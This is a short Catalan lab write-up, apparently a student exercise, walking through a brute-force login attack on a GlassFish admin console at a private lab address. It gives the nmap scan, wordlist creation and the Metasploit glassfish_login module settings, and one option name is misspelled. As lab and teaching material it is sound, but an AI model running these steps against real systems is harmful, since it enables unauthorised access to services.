# Explotació del servei Glassfish

En aquesta pràctica he duit a terme un 'atac de força bruta' contra el servei Glassfish. Aquest consisteix en aconseguir tenir-hi accés a partir de llistes d'usuaris i contrasenyes, a base de prova i error. Anem a veure-ho!

+ En primer lloc, cal que comprovem que el port del servei estigui obert:
> nmap -p4848 -sV 10.0.2.4

> ![](../imatges/glass1.png)
+ Un cop ho hem fet, podem accedir-hi des del navegador per assegurar-nos que tot va bé:

> ![](../imatges/glass2.png)
+ Així doncs, ara ens cal crear els fitxers amb els possibles noms d'usuaris i contrasenyes:
> vim users.txt

> vim pass.txt

> ![](../imatges/glass3.png)
+ Amb els fitxers ja llestos, ara hem de seleccionar el mòdul auxiliar adequat (glassfish_login) i configurar-lo:
> use auxiliary/scanner/http/glassfish_login

> set rhosts 10.0.2.4

> set rport 4848

> set stop_on_succes true

> set user_file /home/kali/users.txt

> set pass_file /home/kali/pass.txt

> ![](../imatges/glass4.png)
+ Un cop tot configurat, l'executem:
> exploit

> ![](../imatges/glass5.png)
+ Com podem veure, hem tingut èxit ja que una de les combinacions ha estat acceptada, pel que ara podem tornar a accedir-hi mitjançant el navegador i introduir aquests credencials:
> ![](../imatges/glass6.png)
+ Així doncs, hem pogut obtenir accés al servei Glassfish!
> ![](../imatges/glass7.png)